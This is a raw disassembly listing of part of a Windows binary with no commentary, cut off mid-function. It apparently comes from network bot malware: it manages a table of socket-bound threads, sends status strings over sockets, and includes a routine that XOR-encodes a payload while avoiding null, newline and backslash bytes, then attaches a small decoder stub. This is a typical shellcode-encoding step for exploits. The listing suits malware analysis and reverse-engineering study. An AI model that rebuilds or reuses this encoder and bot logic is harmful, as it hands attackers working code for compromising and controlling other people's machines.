; =============== S U B R O U T I N E =======================================
sub_417187 proc near ; CODE XREF: sub_4171A7+A�p
; sub_41727F+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_4180D0
push [esp+8+arg_4]
mov esi, eax
call sub_4180D0
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_417187 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4171A7 proc near ; CODE XREF: sub_417296+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_417187
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_4171C4
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4171C4: ; CODE XREF: sub_4171A7+17�j
push ebx
push esi
push edi
push [ebp+arg_8]
call sub_4180D0
push [ebp+arg_C]
mov esi, eax
call sub_4180D0
mov edi, eax
mov ebx, [ebp+arg_0]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov dword ptr unk_43DC3C, eax
lea eax, [edi+1]
mov dword ptr unk_43DC5D, eax
lea eax, [edi+17h]
mov dword ptr unk_43DC55, eax
pop eax
push 74h
sub eax, edi
push 43DBD8h
push ebx
mov dword ptr unk_43DC6B, eax
call sub_417A40
push esi
lea eax, [ebx+74h]
push [ebp+arg_8]
push eax
call sub_417A40
add esi, 74h
push 5
push 43DC4Ch
lea eax, [esi+ebx]
push eax
call sub_417A40
add esi, 5
push edi
push [ebp+arg_C]
lea eax, [esi+ebx]
push eax
call sub_417A40
add esi, edi
push 10h
push 43DC51h
lea eax, [esi+ebx]
push eax
call sub_417A40
add esp, 44h
add esi, 10h
push edi
lea eax, [esi+ebx]
push [ebp+arg_C]
push eax
call sub_417A40
add esi, edi
push 38h
add esi, ebx
push 43DC61h
push esi
call sub_417A40
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_4171A7 endp
; =============== S U B R O U T I N E =======================================
sub_41727F proc near ; CODE XREF: sub_417296+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_417187
push eax
call sub_417303
add esp, 0Ch
retn
sub_41727F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417296 proc near ; CODE XREF: sub_40378E+32�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_41727F
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_4172B6
cmp eax, 0FFFFh
jbe short loc_4172BA
loc_4172B6: ; CODE XREF: sub_417296+17�j
xor eax, eax
jmp short loc_4172FF
; ---------------------------------------------------------------------------
loc_4172BA: ; CODE XREF: sub_417296+1E�j
push esi
push edi
push ebx
call sub_417187
add eax, 101h
push eax
call sub_418175
add esp, 0Ch
mov esi, eax
push edi
push ebx
push edi
push ebx
call sub_417187
pop ecx
pop ecx
push eax
push esi
call sub_4171A7
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41731E
push esi ; lpMem
mov edi, eax
call sub_418227
add esp, 24h
mov eax, edi
pop esi
loc_4172FF: ; CODE XREF: sub_417296+22�j
pop edi
pop ebx
pop ebp
retn
sub_417296 endp
; =============== S U B R O U T I N E =======================================
sub_417303 proc near ; CODE XREF: sub_41727F+E�p
; sub_41731E+47�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_41730C
inc ecx
loc_41730C: ; CODE XREF: sub_417303+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_417303 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41731E proc near ; CODE XREF: sub_417296+56�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_C]
cmp dl, 0Ah
jz short loc_417338
cmp dl, 0Dh
jz short loc_417338
cmp dl, 5Ch
jz short loc_417338
test dl, dl
jnz short loc_41733C
loc_417338: ; CODE XREF: sub_41731E+A�j
; sub_41731E+F�j ...
inc edx
mov [ebp+arg_C], edx
loc_41733C: ; CODE XREF: sub_41731E+18�j
push esi
mov esi, 0FFh
cmp edx, esi
jbe short loc_417364
mov eax, edx
shr eax, 8
cmp al, 0Ah
jz short loc_41735B
cmp al, 0Dh
jz short loc_41735B
cmp al, 5Ch
jz short loc_41735B
test al, al
jnz short loc_417364
loc_41735B: ; CODE XREF: sub_41731E+2F�j
; sub_41731E+33�j ...
add edx, 100h
mov [ebp+arg_C], edx
loc_417364: ; CODE XREF: sub_41731E+26�j
; sub_41731E+3B�j
push edx
call sub_417303
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_41737A
cmp eax, 0FFFFh
jbe short loc_417381
loc_41737A: ; CODE XREF: sub_41731E+53�j
xor eax, eax
jmp loc_41741C
; ---------------------------------------------------------------------------
loc_417381: ; CODE XREF: sub_41731E+5A�j
push ebx
mov bl, byte_445EDC+0D43BCh
xor ecx, ecx
push edi
mov edi, [ebp+arg_8]
test edx, edx
jbe short loc_4173AE
loc_417392: ; CODE XREF: sub_41731E+8E�j
mov al, [ecx+edi]
xor al, bl
jz short loc_4173A5
cmp al, 0Ah
jz short loc_4173A5
cmp al, 0Dh
jz short loc_4173A5
cmp al, 5Ch
jnz short loc_4173A9
loc_4173A5: ; CODE XREF: sub_41731E+79�j
; sub_41731E+7D�j ...
inc bl
xor ecx, ecx
loc_4173A9: ; CODE XREF: sub_41731E+85�j
inc ecx
cmp ecx, edx
jb short loc_417392
loc_4173AE: ; CODE XREF: sub_41731E+72�j
cmp edx, esi
mov byte_445EDC+0D43BCh, bl
ja short loc_4173DA
push 15h
push 43DBC0h
push [ebp+arg_0]
mov byte ptr unk_43DBCD, dl
mov byte ptr unk_43DBD1, bl
call sub_417A40
add esp, 0Ch
push 15h
jmp short loc_4173FB
; ---------------------------------------------------------------------------
loc_4173DA: ; CODE XREF: sub_41731E+98�j
push 17h
push 43DBA8h
push [ebp+arg_0]
mov word ptr unk_43DBB6, dx
mov byte ptr unk_43DBBB, bl
call sub_417A40
add esp, 0Ch
push 17h
loc_4173FB: ; CODE XREF: sub_41731E+BA�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_417417
mov edx, [ebp+arg_0]
lea esi, [ecx+edx]
loc_417409: ; CODE XREF: sub_41731E+F7�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_417409
loc_417417: ; CODE XREF: sub_41731E+E3�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_41741C: ; CODE XREF: sub_41731E+5E�j
pop esi
leave
retn
sub_41731E endp
; =============== S U B R O U T I N E =======================================
sub_41741F proc near ; CODE XREF: sub_4069DA+21F�p
; sub_407B48+F1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, 44B668h
loc_417427: ; CODE XREF: sub_41741F+18�j
cmp byte ptr [eax], 0
jz short loc_41743B
add eax, 234h
inc edi
cmp eax, 519F18h
jl short loc_417427
jmp short loc_417486
; ---------------------------------------------------------------------------
loc_41743B: ; CODE XREF: sub_41741F+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, [esi+44B668h]
push eax
call sub_419300
mov eax, [esp+14h+arg_4]
and dword ptr [esi+44B86Ch], 0
and dword ptr [esi+44B870h], 0
mov [esi+44B868h], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
and byte ptr [esi+44B880h], 0
mov [esi+44B874h], eax
pop esi
loc_417486: ; CODE XREF: sub_41741F+1A�j
mov eax, edi
pop edi
retn
sub_41741F endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_41748A(LPVOID)
sub_41748A proc near ; DATA XREF: sub_40FCA3+5D59�o
s = dword ptr -98h
var_94 = dword ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+s]
rep movsd
push [ebp+var_10] ; int
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C] ; int
push eax ; int
push [ebp+s] ; s
call sub_4174DC
push [ebp+var_14]
call sub_417735
add esp, 14h
push 0 ; dwExitCode
call ExitThread ; ExitThread
sub_41748A endp
; ---------------------------------------------------------------------------
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4174DC(SOCKET s, int, int, int)
sub_4174DC proc near ; CODE XREF: sub_41748A+38�p
var_200 = dword ptr -200h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push 43DC9Ch ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
xor edi, edi
mov esi, 44B668h
loc_417506: ; CODE XREF: sub_4174DC+78�j
cmp byte ptr [esi], 0
jz short loc_417547
cmp [ebp+arg_C], 0
jnz short loc_41751A
cmp dword ptr [esi+204h], 0
jnz short loc_417547
loc_41751A: ; CODE XREF: sub_4174DC+33�j
push esi
push edi
lea eax, [ebp+var_200]
push 43A17Ch
push eax
call sub_41795B
push 1 ; int
lea eax, [ebp+var_200]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 24h
loc_417547: ; CODE XREF: sub_4174DC+2D�j
; sub_4174DC+3C�j
add esi, 234h
inc edi
cmp esi, 519F18h
jl short loc_417506
pop edi
pop esi
leave
retn
sub_4174DC endp
; =============== S U B R O U T I N E =======================================
sub_41755A proc near ; CODE XREF: sub_40FCA3+5081�p
; sub_4175E2+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_4175DC
cmp esi, 5DCh
jge short loc_4175DC
imul esi, 234h
push edi
push ebx ; dwExitCode
lea edi, [esi+44B87Ch]
push dword ptr [edi] ; hThread
call TerminateThread ; TerminateThread
cmp [edi], ebx
jz short loc_41758C
inc ebp
loc_41758C: ; CODE XREF: sub_41755A+2F�j
mov [edi], ebx
lea edi, [esi+44B870h]
mov [esi+44B868h], ebx
mov [esi+44B86Ch], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_4175AD
push eax ; dwProcessId
call sub_41645E
pop ecx
loc_4175AD: ; CODE XREF: sub_41755A+4A�j
mov [edi], ebx
lea edi, [esi+44B874h]
mov [esi+44B668h], bl
mov [esi+44B880h], bl
push dword ptr [edi] ; s
call closesocket_0
lea esi, [esi+44B878h]
mov [edi], ebx
push dword ptr [esi] ; s
call closesocket_0
mov [esi], ebx
pop edi
loc_4175DC: ; CODE XREF: sub_41755A+D�j
; sub_41755A+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_41755A endp
; =============== S U B R O U T I N E =======================================
sub_4175E2 proc near ; CODE XREF: sub_40B584:loc_40B5A8�p
; sub_40DF02+18�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, 44B668h
loc_4175EE: ; CODE XREF: sub_4175E2+2A�j
cmp byte ptr [esi], 0
jz short loc_4175FF
push edi
call sub_41755A
test eax, eax
pop ecx
jz short loc_4175FF
inc ebx
loc_4175FF: ; CODE XREF: sub_4175E2+F�j
; sub_4175E2+1A�j
add esi, 234h
inc edi
cmp esi, 519F18h
jl short loc_4175EE
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_4175E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417614 proc near ; CODE XREF: sub_40FCA3+1E8E�p
; sub_40FCA3+1FDA�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, 44B86Ch
loc_417628: ; CODE XREF: sub_417614+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_41764A
test edi, edi
jle short loc_41763C
cmp [esi], edi
jz short loc_41763C
cmp ebx, edi
jnz short loc_41764A
loc_41763C: ; CODE XREF: sub_417614+1E�j
; sub_417614+22�j
push ebx
call sub_41755A
test eax, eax
pop ecx
jz short loc_41764A
inc [ebp+var_4]
loc_41764A: ; CODE XREF: sub_417614+1A�j
; sub_417614+26�j ...
add esi, 234h
inc ebx
cmp esi, 51A11Ch
jl short loc_417628
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_417614 endp
; =============== S U B R O U T I N E =======================================
sub_417661 proc near ; CODE XREF: sub_407AD1+B�p
; sub_407B48+32�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, 44B868h
loc_417668: ; CODE XREF: sub_417661+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_417671
inc eax
loc_417671: ; CODE XREF: sub_417661+D�j
add ecx, 234h
cmp ecx, 51A118h
jl short loc_417668
retn
sub_417661 endp
; =============== S U B R O U T I N E =======================================
sub_417680 proc near ; CODE XREF: sub_40FCA3+57F5�p
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, 44B868h
push esi
loc_41768A: ; CODE XREF: sub_417680+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_4176A3
add ecx, 234h
inc edx
cmp ecx, 51A118h
jl short loc_41768A
pop esi
retn
; ---------------------------------------------------------------------------
loc_4176A3: ; CODE XREF: sub_417680+10�j
mov eax, edx
pop esi
retn
sub_417680 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4176A7(SOCKET s, int, int, int, int, int, int, int)
sub_4176A7 proc near ; CODE XREF: sub_40FCA3:loc_415B86�p
var_200 = dword ptr -200h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_4176C0
push [ebp+arg_1C]
call sub_417ECF
pop ecx
loc_4176C0: ; CODE XREF: sub_4176A7+E�j
push eax
push [ebp+arg_18]
call sub_417614
pop ecx
test eax, eax
pop ecx
jle short loc_4176EC
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push 43DCC4h
push eax
call sub_41795B
add esp, 14h
jmp short loc_417706
; ---------------------------------------------------------------------------
loc_4176EC: ; CODE XREF: sub_4176A7+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push 43DCACh
push eax
call sub_41795B
add esp, 10h
loc_417706: ; CODE XREF: sub_4176A7+43�j
cmp [ebp+arg_C], 0
jnz short loc_417726
push 0 ; int
lea eax, [ebp+var_200]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_417726: ; CODE XREF: sub_4176A7+63�j
lea eax, [ebp+var_200]
push eax
call sub_40CB08
pop ecx
leave
retn
sub_4176A7 endp
; =============== S U B R O U T I N E =======================================
sub_417735 proc near ; CODE XREF: sub_401000+A2�p
; sub_401444+8D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov [eax+44B87Ch], ecx
mov [eax+44B868h], ecx
mov [eax+44B86Ch], ecx
mov [eax+44B870h], ecx
mov [eax+44B874h], ecx
mov [eax+44B878h], ecx
mov [eax+44B668h], cl
mov [eax+44B880h], cl
retn
sub_417735 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417772 proc near ; CODE XREF: sub_40FCA3+633C�p
; sub_41789A+61�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_4177D4
; ---------------------------------------------------------------------------
loc_41777E: ; CODE XREF: sub_417772+66�j
cmp eax, 1
jnz short loc_4177E5
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_4177E5
cmp cl, 2Ah
jz short loc_4177BD
cmp cl, 3Fh
jz short loc_4177A2
cmp cl, 5Bh
jz short loc_4177A7
xor eax, eax
cmp cl, dl
setz al
loc_4177A2: ; CODE XREF: sub_417772+22�j
inc [ebp+arg_4]
jmp short loc_4177D0
; ---------------------------------------------------------------------------
loc_4177A7: ; CODE XREF: sub_417772+27�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_417806
mov esi, [ebp+arg_0]
jmp short loc_4177CE
; ---------------------------------------------------------------------------
loc_4177BD: ; CODE XREF: sub_417772+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_41789A
mov esi, [ebp+arg_0]
dec esi
loc_4177CE: ; CODE XREF: sub_417772+49�j
pop ecx
pop ecx
loc_4177D0: ; CODE XREF: sub_417772+33�j
inc esi
mov [ebp+arg_0], esi
loc_4177D4: ; CODE XREF: sub_417772+A�j
mov cl, [esi]
test cl, cl
jnz short loc_41777E
jmp short loc_4177E5
; ---------------------------------------------------------------------------
loc_4177DC: ; CODE XREF: sub_417772+76�j
cmp eax, 1
jnz short loc_417801
inc esi
mov [ebp+arg_0], esi
loc_4177E5: ; CODE XREF: sub_417772+F�j
; sub_417772+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_4177DC
cmp eax, 1
jnz short loc_417801
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_417801
cmp byte ptr [esi], 0
jnz short loc_417801
xor eax, eax
inc eax
jmp short loc_417803
; ---------------------------------------------------------------------------
loc_417801: ; CODE XREF: sub_417772+6D�j
; sub_417772+7B�j ...
xor eax, eax
loc_417803: ; CODE XREF: sub_417772+8D�j
pop esi
pop ebp
retn
sub_417772 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417806 proc near ; CODE XREF: sub_417772+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
xor eax, eax
mov ecx, [edx]
and [ebp+var_8], edi
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_417827
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_417827: ; CODE XREF: sub_417806+19�j
push ebx
push esi
loc_417829: ; CODE XREF: sub_417806+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_417837
cmp [ebp+var_4], eax
jnz short loc_41787F
loc_417837: ; CODE XREF: sub_417806+2A�j
test edi, edi
jnz short loc_417874
cmp bl, 2Dh
jnz short loc_417868
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_417868
cmp al, 5Dh
jz short loc_417868
cmp [ebp+var_4], edi
jnz short loc_417868
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_417874
cmp bl, al
jg short loc_417874
mov [edx], esi
jmp short loc_417871
; ---------------------------------------------------------------------------
loc_417868: ; CODE XREF: sub_417806+38�j
; sub_417806+44�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_417874
loc_417871: ; CODE XREF: sub_417806+60�j
xor edi, edi
inc edi
loc_417874: ; CODE XREF: sub_417806+33�j
; sub_417806+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_417829
; ---------------------------------------------------------------------------
loc_41787F: ; CODE XREF: sub_417806+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_41788C
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_41788C: ; CODE XREF: sub_417806+7E�j
cmp edi, eax
jnz short loc_417895
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_417895: ; CODE XREF: sub_417806+88�j
mov eax, edi
pop edi
leave
retn
sub_417806 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41789A proc near ; CODE XREF: sub_417772+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
xor ebx, ebx
jmp short loc_4178CA
; ---------------------------------------------------------------------------
loc_4178B4: ; CODE XREF: sub_41789A+36�j
mov dl, [eax]
cmp dl, 3Fh
jz short loc_4178C5
cmp dl, 2Ah
jnz short loc_4178D7
cmp dl, 3Fh
jnz short loc_4178C8
loc_4178C5: ; CODE XREF: sub_41789A+1F�j
inc ecx
mov [edi], ecx
loc_4178C8: ; CODE XREF: sub_41789A+29�j
inc dword ptr [esi]
loc_4178CA: ; CODE XREF: sub_41789A+18�j
mov ecx, [edi]
mov eax, [esi]
cmp [ecx], bl
jnz short loc_4178B4
jmp short loc_4178D7
; ---------------------------------------------------------------------------
loc_4178D4: ; CODE XREF: sub_41789A+40�j
inc eax
mov [esi], eax
loc_4178D7: ; CODE XREF: sub_41789A+24�j
; sub_41789A+38�j
cmp byte ptr [eax], 2Ah
jz short loc_4178D4
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_4178F9
cmp [eax], bl
jz short loc_4178EC
xor eax, eax
jmp short loc_417956
; ---------------------------------------------------------------------------
loc_4178EC: ; CODE XREF: sub_41789A+4C�j
cmp dl, bl
jnz short loc_4178F9
cmp [eax], bl
jnz short loc_4178F9
xor eax, eax
inc eax
jmp short loc_417956
; ---------------------------------------------------------------------------
loc_4178F9: ; CODE XREF: sub_41789A+48�j
; sub_41789A+54�j ...
push ecx
push eax
call sub_417772
pop ecx
test eax, eax
pop ecx
jnz short loc_417940
loc_417906: ; CODE XREF: sub_41789A+A4�j
inc dword ptr [edi]
mov eax, [edi]
jmp short loc_417918
; ---------------------------------------------------------------------------
loc_41790C: ; CODE XREF: sub_41789A+86�j
cmp cl, 5Bh
jz short loc_417922
cmp dl, bl
jz short loc_417922
inc eax
mov [edi], eax
loc_417918: ; CODE XREF: sub_41789A+70�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jnz short loc_41790C
loc_417922: ; CODE XREF: sub_41789A+75�j
; sub_41789A+79�j
cmp [eax], bl
jz short loc_417937
push eax
push dword ptr [esi]
call sub_417772
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_41793C
; ---------------------------------------------------------------------------
loc_417937: ; CODE XREF: sub_41789A+8A�j
mov [ebp+var_4], ebx
xor eax, eax
loc_41793C: ; CODE XREF: sub_41789A+9B�j
cmp eax, ebx
jnz short loc_417906
loc_417940: ; CODE XREF: sub_41789A+6A�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_417953
mov eax, [esi]
cmp [eax], bl
jnz short loc_417953
mov [ebp+var_4], 1
loc_417953: ; CODE XREF: sub_41789A+AA�j
; sub_41789A+B0�j
mov eax, [ebp+var_4]
loc_417956: ; CODE XREF: sub_41789A+50�j
; sub_41789A+5D�j
pop edi
pop esi
pop ebx
leave
retn
sub_41789A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41795B proc near ; CODE XREF: sub_401000+61�p
; sub_4010B2+320�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_41A5BA
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41799B
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4179A8
; ---------------------------------------------------------------------------
loc_41799B: ; CODE XREF: sub_41795B+36�j
lea eax, [ebp+var_20]
push eax ; int
push 0 ; Buffer
call sub_41A4A5
pop ecx
pop ecx
loc_4179A8: ; CODE XREF: sub_41795B+3E�j
mov eax, esi
pop esi
leave
retn
sub_41795B endp
; =============== S U B R O U T I N E =======================================
sub_4179AD proc near ; CODE XREF: sub_401000+2E�p
; sub_4019BB+30�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword ptr unk_43DCEC, eax
retn
sub_4179AD endp
; =============== S U B R O U T I N E =======================================
sub_4179B7 proc near ; CODE XREF: sub_4010B2+CB�p
; sub_4010B2+13F�p ...
mov eax, dword ptr unk_43DCEC
imul eax, 343FDh
add eax, 269EC3h
mov dword ptr unk_43DCEC, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_4179B7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4179E0 proc near ; CODE XREF: sub_4010B2+281�p
; sub_401444+180�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_417A33
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_417A27
neg ecx
and ecx, 3
jz short loc_417A09
sub edx, ecx
loc_417A03: ; CODE XREF: sub_4179E0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_417A03
loc_417A09: ; CODE XREF: sub_4179E0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_417A27
rep stosd
test edx, edx
jz short loc_417A2D
loc_417A27: ; CODE XREF: sub_4179E0+18�j
; sub_4179E0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_417A27
loc_417A2D: ; CODE XREF: sub_4179E0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_417A33: ; CODE XREF: sub_4179E0+A�j
mov eax, [esp+arg_0]
retn
sub_4179E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417A40 proc near ; CODE XREF: sub_4010B2+22D�p
; sub_4010B2+23E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_417A60
cmp edi, eax
jb loc_417BD8
loc_417A60: ; CODE XREF: sub_417A40+16�j
test edi, 3
jnz short loc_417A7C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_417A9C
rep movsd
jmp off_417B88[edx*4]
; ---------------------------------------------------------------------------
loc_417A7C: ; CODE XREF: sub_417A40+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_417A94
and eax, 3
add ecx, eax
jmp dword ptr loc_417A9C+4[eax*4]
; ---------------------------------------------------------------------------
loc_417A94: ; CODE XREF: sub_417A40+46�j
jmp dword ptr loc_417B98[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_417A9C: ; CODE XREF: sub_417A40+31�j
; sub_417A40+8E�j ...
jmp off_417B1C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_417AB0
dd offset loc_417ADC
dd offset loc_417B00
; ---------------------------------------------------------------------------
loc_417AB0: ; DATA XREF: sub_417A40+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_417A9C
rep movsd
jmp off_417B88[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_417ADC: ; DATA XREF: sub_417A40+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_417A9C
rep movsd
jmp off_417B88[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_417B00: ; DATA XREF: sub_417A40+6C�o
and edx, ecx
